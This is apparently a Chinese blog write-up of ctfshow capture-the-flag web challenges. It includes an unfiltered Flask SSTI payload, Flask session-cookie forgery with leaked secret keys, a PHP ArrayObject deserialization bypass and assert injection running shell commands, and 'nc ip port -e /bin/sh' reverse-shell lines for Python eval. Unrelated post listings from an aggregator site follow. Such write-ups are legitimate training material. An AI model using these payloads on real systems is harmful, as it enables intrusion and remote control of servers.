当前位置：首页 > news >正文

ctfshow 愚人杯菜狗杯部分题目(flasksession伪造ssti)

news 2026/2/9 16:42:41

<1>愚人杯

(1) easy_signin

(2) easy_ssti(无过滤ssti)

(3) easy_flask(flash-session伪造)

(4) easy_php(C:开头序列化数据)

<2> 菜狗杯

(1) 抽老婆(flask_session伪造)

(2) 一言既出，驷马难追(intval)

(3) 传说之下（js控制台）

(4) 算力超群(python eval命令执行)

(5) 茶歇区(整形溢出)

编辑

<1>愚人杯

(1) easy_signin

img参数传入 index.php的base64编码

然后复制图片base64编码

解码得到flag

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-03-27 10:30:30
# @Last Modified by:   h1xa
# @Last Modified time: 2023-03-28 12:15:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/$image=$_GET['img'];$flag = "ctfshow{7180858b-b87e-450d-8944-a3d719f92ada}";
if(isset($image)){$image = base64_decode($image);$data = base64_encode(file_get_contents($image));echo "<img src='data:image/png;base64,$data'/>";
}else{$image = base64_encode("face.png");header("location:/?img=".$image);
}

(2) easy_ssti(无过滤ssti)

from flask import Flask
from flask import render_template_string,render_template
app = Flask(__name__)@app.route('/hello/')
def hello(name=None):return render_template('hello.html',name=name)
@app.route('/hello/<name>')
def hellodear(name):if "ge" in name:return render_template_string('hello %s' % name)elif "f" not in name:return render_template_string('hello %s' % name)else:return 'Nonononon'

http://4de9f549-c52a-44a4-8839-1e14dddf604e.challenge.ctf.show/hello/{{''.__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__.__builtins__.eval("__import__('os').popen('cd ..;cat *lag').read()")}}

(3) easy_flask(flash-session伪造)

得到 SECRET_KEY:'S3cr3tK3y'

根据提示：But,there are some things I only want to give to users whose role is admin.

应该是需要构造JWT里role为admin身份即可

利用flask_session_cookie_manager3.py 伪造JWT

{"loggedin": true,"role": "admin","username": "a"}

eyJsb2dnZWRpbiI6dHJ1ZSwicm9sZSI6ImFkbWluIiwidXNlcm5hbWUiOiJhIn0.ZChNpw.V3E8F9wjt306gFpc0_5hA7bAl9Y

...... 怎么是假的不过也给我们提供了下载路由下载一下 app.py 成功得到源码

得到了 ........ 隐藏的内容

users = {'admin': {'password': 'LKHSADSFHLA;KHLK;FSDHLK;ASFD', 'role': 'admin'}
}@app.route('/download/')
def download():if 'loggedin' in session:filename = request.args.get('filename')if 'filename' in request.args:              return send_file(filename, as_attachment=True)return redirect(url_for('login'))@app.route('/hello/')
def hello_world():try:s = request.args.get('eval')return f"hello,{eval(s)}"except Exception as e:print(e)passreturn "hello"

/hello路由存在 eval() 可以命令执行

__import__('os').system('nc ip port -e /bin/sh')

(4) easy_php(C:开头序列化数据)

<?php 
error_reporting(0);
highlight_file(__FILE__);class ctfshow{public function __wakeup(){die("not allowed!");}public function __destruct(){system($this->ctfshow);}}$data = $_GET['1+1>2'];if(!preg_match("/^[Oa]:[\d]+/i", $data)){unserialize($data);
}?>

正则过滤了以 O:数字或者a:数字开头的，明显过滤了平常的类与数组的序列化格式数据

?1%2b1>2=C:11:"ArrayObject":67:{x:i:0;O:7:"ctfshow":1:{s:7:"ctfshow";s:12:"cat /f1agaaa";};m:a:0:{}}

之前攻防世界 Web_php_unserialize 就可以通过 O:+7 这种形式绕过 /[oc]:\d+:/i 的正则但这里因为是php7.几的版本因此不能利用 O:+7绕过，反序列化不了。如果是5.几是可以的

<2> 菜狗杯

(1) 抽老婆(flask_session伪造)

存在 /download路由可以任意文件下载，之过滤了flag

根据报错得到当前路径 /app/static/img/

目录遍历，下载app.py 访问：/download?file=../../app.py

from flask import *
import os
import random
from flag import flag#初始化全局变量
app = Flask(__name__)
app.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'@app.route('/', methods=['GET'])
def index():  return render_template('index.html')@app.route('/getwifi', methods=['GET'])
def getwifi():session['isadmin']=Falsewifi=random.choice(os.listdir('static/img'))session['current_wifi']=wifireturn render_template('getwifi.html',wifi=wifi)@app.route('/download', methods=['GET'])
def source(): filename=request.args.get('file')if 'flag' in filename:return jsonify({"msg":"你想干什么？"})else:return send_file('static/img/'+filename,as_attachment=True)@app.route('/secret_path_U_never_know',methods=['GET'])
def getflag():if session['isadmin']:return jsonify({"msg":flag})else:return jsonify({"msg":"你怎么知道这个路径的？不过还好我有身份验证"})if __name__ == '__main__':app.run(host='0.0.0.0',port=80,debug=True)

可以看见SECRET_KEY : 'tanji_is_A_boy_Yooooooooooooooooooooo!'

当前session为：eyJjdXJyZW50X3dpZmkiOiJhZjE2ZWMxMmZmYTUwZDQ1MGJjYjUyNTQ1NjJjYmY4Zi5qcGciLCJpc2FkbWluIjpmYWxzZX0.ZCgl0g.cvGaUTCW77a8qu5VaFee5OsFyxI

我们应该利用SECRET_KEY flask 伪造session 为admin

github上有对应项目：flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder

拿伪造好的session 去访问 /secret_path_U_never_know

python3 flask_session_cookie_manager3.py encode -s 'tanji_is_A_boy_Yooooooooooooooooooooo!' -t "{'isadmin': True}"

(2) `一言既出，驷马难追(intval)`

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){if ($_GET['num'] == 114514){assert("intval($_GET[num])==1919810") or die("一言既出，驷马难追!");echo $flag;} 
}

利用断言，可以想办法构造一个为真的值绕过assert 或者直接利用assert达到rce

?num=114514)==1%20or%20system(%27ls%27);%23

?num=114514);(1919810

?num=114514%2b1919810-114514 %2b是+

(3) 传说之下（js控制台）

看js源码发现创建了一个 Game对象，里面记录的分数 score

在控制台输入： Game.score=2077 然后玩游戏吃一个果子就行

(4) 算力超群(python eval命令执行)

b变量没有任何校验,直接import os模块，system命令执行反弹shell

__import__('os').system('nc ip port -e /bin/sh')

(5) 茶歇区(整形溢出)

64位的有符号数表示的最大范围是 2^63-1 = 9223372036854775807 19位数

但是此时这里进行 x10 运算，溢出太多也没有用，所以我们需要传入18位数，这样刚好溢出

例如： 932337203685477580

传两次得到flag

ctfshow 愚人杯菜狗杯部分题目(flasksession伪造ssti)

目录 <1>愚人杯 (1) easy_signin (2) easy_ssti(无过滤ssti) (3) easy_flask(flash-session伪造) (4) easy_php(C:开头序列化数据) <2> 菜狗杯 (1) 抽老婆(flask_session伪造) (2) 一言既出，驷马难追(intval) (3) 传说之下（js控制台&…...

编程日记 2023/4/18 21:11:08

linux拓展笔记——【补充学习知识点】

文章目录1. ./configure --prefix中的prefix详解1. ./configure --prefix中的prefix详解源码的安装一般由3个步骤组成：配置(configure)、编译(make)、安装(makeinstall)。 Configure是一个可执行脚本，在待安装的源码路径下使用命令./configure–help输…...

编程日记 2023/4/18 21:06:07

为何银行各岗位之间的薪酬差别如此之大？

银行里的职位种类相对较多，观观整理了5个最常见的职位，看一下你要申请的职位薪资水平到底是怎样的？根据如信银行考试中心发布： 1、客户经理岗客户经理分为对公客户经理和对私客户经理，他们的主要工作不同&#xff0…...

编程日记 2023/4/18 21:01:06

TensorFlow 深度学习第二版：1~5

原文：Deep Learning with TensorFlow Second Edition 协议：CC BY-NC-SA 4.0 译者：飞龙本文来自【ApacheCN 深度学习译文集】，采用译后编辑（MTPE）流程来尽可能提升效率。不要担心自己的形象，只…...

编程日记 2023/4/18 20:56:05

微前端micro-app的使用

演示效果子应用的项目基应用嵌入子应用效果图目录前言一、微前端是什么？ 它主要解决了两个问题： 二、使用步骤 1.安装依赖 2.在入口处引入 3.子应用的路由（） 4.分配一个路由给子应用（重要）&#xff0…...

编程日记 2023/4/18 20:51:03

【JUC】Java内存模型之JMM

【JUC】Java内存模型之JMM 文章目录【JUC】Java内存模型之JMM1. 概念2. JMM三大特性2.1 可见性2.2 原子性2.3 有序性3. 多线程对变量的读写过程4. 先行发生原则——happens-before4.1 happens-before八条规则4.1.1 次序规则4.1.2 锁定规则4.1.3 volatile变量规则4.1.4 传递规则…...

编程日记 2023/4/18 20:46:02

Win11快速打开便签和使用技巧分享

Win11快速打开便签和使用技巧分享。Win11系统中为用户提供了一个非常实用的系统组件，就是便签功能，使用这个功能可以帮助我们便捷的进行一些重要内容的记录。那么如何去开启开启这个程序来使用呢？来看看以下的详情分享吧。详细分享&#xff…...

编程日记 2023/4/18 20:40:56

CSS：横向导航栏

横向导航栏（盗版导航栏，B站仿写。） 原视频链接 <html><head><title>demo</title><style>*{margin: 0;padding: 0;list-style: none;text-decoration: none;}body{display: flex;justify-content: center;a…...

编程日记 2023/5/30 6:38:23

视频动态库测试及心得

视频动态库测试及心得这几天一直在弄动态库测试，h给的写好的动态库--预处理模块的库。视频处理项目一部分，需要连接实际情况测试。需求： 1.把实际相机连接到，并读取实时数据流，保存到双循环链表里面; 2.测试背景建模…...

编程日记 2023/4/18 20:30:53

陶泓达：4.18午间欧盘黄金原油最新精准操作建议！

黄金方面： 黄金消息面解析：周一（4月17日）美市盘中，美国公布的4月纽约联储制造业指数和4月NAHB房产市场指数均超出预期，提振了美联储在5月继续加息的预期。数据公布之后，美元指数加速上扬&#x…...

编程日记 2023/4/18 20:25:52

环境变量相关知识

目录目录谢谢你的阅读，这是对我最大的鼓舞先说结论： 开始论述： 让我们举个例子相关指令创建本地变量创建环境变量方法一： 方法二： 删除环境变量子进程中也有环境变量第一种： 第二种 …...

编程日记 2023/4/18 20:20:51

如何快速入门ChatGPT

作为一个AI模型，ChatGPT并不需要像人一样“学习”，它已经通过大量的训练数据和算法进行了预训练，可以回答广泛的问题。然而，如果你想学习如何使用ChatGPT来进行对话或者问答，以下是一些建议： 一、了解Ch…...

编程日记 2023/4/18 20:15:50

Akka定时任务schedule()方法

Akka定时任务schedule()方法文章目录Akka定时任务schedule()方法什么是Akka定时任务schedule()方法？如何使用Akka定时任务schedule()方法？如何在actor外部获取Scheduler对象为什么需要提供一个隐式的ExecutionContext对象，用于执行定时任务&…...

编程日记 2023/4/18 20:10:49

Python实现处理和分析大规模文本数据集，包括数据清洗、标注和预处理

处理和分析大规模文本数据集，包括数据清洗、标注和预处理，是自然语言处理（NLP）中非常重要的一步。Python 是一种非常流行的编程语言，拥有丰富的 NLP 库和工具，可以帮助我们完成这些任务。以下是一个简单的实现示例，包括数据清洗、标注和预处理： import re import nltk…...

编程日记 2023/4/18 20:05:47

灌区量测水系统

1)灌区量测水灌区量测水是水资源管理的基础，是推进节水农业和水价改革的重要手段。常规在主要水闸处，监测闸前和闸后水位及闸门开启状态(闸位)，通过实时监测数据，计算过闸流量。要实现全灌区水资源动态配置、精准灌溉&#xff0…...

编程日记 2023/5/30 6:39:37

3.3 泰勒公式

学习目标： 复习微积分基础知识。泰勒公式是微积分的一个重要应用，因此在学习泰勒公式之前，需要复习微积分的基本概念和技能，包括函数的导数和微分、极限、定积分等。可以参考MIT的微积分课程进行复习和加强。学习泰勒级数和泰勒…...

编程日记 2023/5/29 21:20:14

ubuntu中通过vscode编译调试ORB-SLAM3

为了在orb-slam3的基础上进行二次开发，这几天花了不少精力，终于搞懂怎么在ubuntu系统中像windows里visual studio中一样方便的打断点调试了，在这里把整个过程再重新梳理一下。 1 首先从安装ubuntu 22.04开始因为是从实验室毕业先辈那里继承…...

编程日记 2023/4/18 19:50:44

阿里版 ChatGPT 突然上线!

转自:纯洁的微笑其实早本月初，就传出过不少阿里要推出类ChatGPT的消息。前几天率先流出的天猫精灵“鸟鸟分鸟”脱口秀版GPT，就是基于大模型的“压缩版”，已经以其惊艳表现吸引了众目光。如今“原版大菜”上桌，自然一点即着&a…...

编程日记 2023/4/18 19:45:43

《Kubernetes部署篇：Ubuntu20.04基于containerd部署kubernetes1.24.12单master集群》

一、架构图如下图所示： 二、环境信息主机名K8S版本系统版本内核版本IP地址备注k8s-master-621.24.12Ubuntu 20.04.5 LTS5.15.0-69-generic192.168.1.62master节点k8s-worker-631.24.12Ubuntu 20.04.5 LTS5.15.0-69-generic192.168.1.63worker节点k8s-worker-641…...

编程日记 2023/5/31 2:50:29

MAZDA CX-50没现车怎么办？赶紧去VR看车啊！

爱车一族往往都有过这样的经历：听说某家品牌出了一款心仪的新车，于是一直心心念念想要先睹为快。然而这时候问题就来了：新车从发布到量产上市往往要经历一段过程。没有现车的日子里，就算每天去4S店蹲守也看不到新车。那种心里痒痒…...

编程日记 2023/5/31 2:51:47

Cursor实现用excel数据填充word模版的方法

cursor主页：https://www.cursor.com/ 任务目标：把excel格式的数据里的单元格，按照某一个固定模版填充到word中文章目录注意事项逐步生成程序1. 确定格式2. 调试程序注意事项直接给一个excel文件和最终呈现的word文件的示例，…...

编程新知 2025/8/23 5:46:26

多场景 OkHttpClient 管理器 - Android 网络通信解决方案

下面是一个完整的 Android 实现，展示如何创建和管理多个 OkHttpClient 实例，分别用于长连接、普通 HTTP 请求和文件下载场景。 <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas…...

编程新知 2025/12/15 1:34:37

c++ 面试题(1)-----深度优先搜索（DFS）实现

操作系统：ubuntu22.04 IDE:Visual Studio Code 编程语言：C11 题目描述地上有一个 m 行 n 列的方格，从坐标 [0,0] 起始。一个机器人可以从某一格移动到上下左右四个格子，但不能进入行坐标和列坐标的数位之和大于 k 的格子。例…...

编程新知 2026/1/10 10:16:16

Vue2 第一节_Vue2上手_插值表达式{{}}_访问数据和修改数据_Vue开发者工具

文章目录 1.Vue2上手-如何创建一个Vue实例,进行初始化渲染2. 插值表达式{{}}3. 访问数据和修改数据4. vue响应式5. Vue开发者工具--方便调试 1.Vue2上手-如何创建一个Vue实例,进行初始化渲染准备容器引包创建Vue实例 new Vue()指定配置项 ->渲染数据准备一个容器,例如: …...

编程新知 2026/2/7 10:59:19